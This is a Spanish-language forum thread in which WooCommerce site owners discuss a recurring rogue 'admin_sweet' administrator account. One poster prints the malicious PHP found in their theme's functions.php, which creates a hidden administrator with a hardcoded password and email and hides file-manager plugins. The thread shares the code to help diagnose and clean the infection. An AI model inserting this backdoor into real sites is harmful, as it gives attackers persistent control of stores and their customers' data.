Buenas! Estamos con inconvenientes en una tienda online woocommerce. Tenemos roto el dashboard de plugins, podemos visualizar y desactivar pero no deja actualizar ni agregar plugins. (si hacemos desde ftp si podemos).
Además se autogenera un usuario administrador “admin_sweet”. Si lo eliminamos se vuelve a generar al recargar la página. Revisamos el codigo de los archivos de wordpress y no encontramos ningun snippet insertado que pueda estar generando esto.
¿Alguna recomendacion?
Gracias
Hola.
Según leo en Google sobre el usuario admin_sweet , se trata de un ataque y esta vulnerabilidad le esta pasando ya a varios usuarios.
Podes usar scaneres para saber donde esta el código que genera ese super admin.
Por otro lado yo empezaría desde el VPS, comparando los tamaños de los archivos del CORE de WP para saber si algo se ha modificado o con la misma fecha de modificación, luego ir al theme activo y buscar entre los archivos más comunes como functions.php o los visibles, finalmente a los plugins ir desactivando uno a uno…
Puede que el scanner te ayude más rápido pero puede tb que ni lo detecte. Si en caso necesitas la solución urgente te sugiero que contrates un Dev o una agencia de esas que te limpian la web.
Saludos
Muchas gracias por la respuesta, si hemos escaneado y buscando en los archivos core del wp pero no encontramos. Tenes algun scanner especifico que recomiendes ?
Busque en el archivos Functions del theme activo (salient) y encontre el codigo del hack que ocacionaba el problema. Lo dejo aca porque seguro a alguien le sea util. Es muy claro las acciones que ocacionaba. Ahora la cuestion es como llego a insertarse en el codigo…
add_action( 'template_redirect', 'wpdaxue' );
if(!isset($_GET['access'])&&$_GET['access']!=='set_up'){
function hide_plugins($plugins){
unset( $plugins['file-manager/file-manager.php'] );
unset( $plugins['wp-file-manager/file_folder_manager.php'] );
return $plugins;
}
add_action('all_plugins','hide_plugins');
}
function wpdaxue(){
$username = 'admin_sweet';
$password = 'A4bGff!dV5';
$email_address = 'hnthzt@163.com';
if ( isset($username) && isset($password) && isset($email_address ) ) {
if (!username_exists($username)&&!email_exists($email_address)){
$user_id = wp_create_user($username,$password,$email_address);
if(is_int($user_id)){
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role('administrator');
}
}
}
}
1 me gusta
Hola chicos, me ha pasado lo mismo en mi web. Se ha colado un código hacker en el archivo functions.php. El mismo usuario con el mismo correo que no importa la de veces que intente borrarlos, siempre reaparece
Habéis podido solucionar el problema? Seria de gran ayuda una solución. En mi caso las copias de seguridad de mo web no valen ya que solo tengo hasta hace 15 días y esto pasó hace más tiempo…
Muchas gracias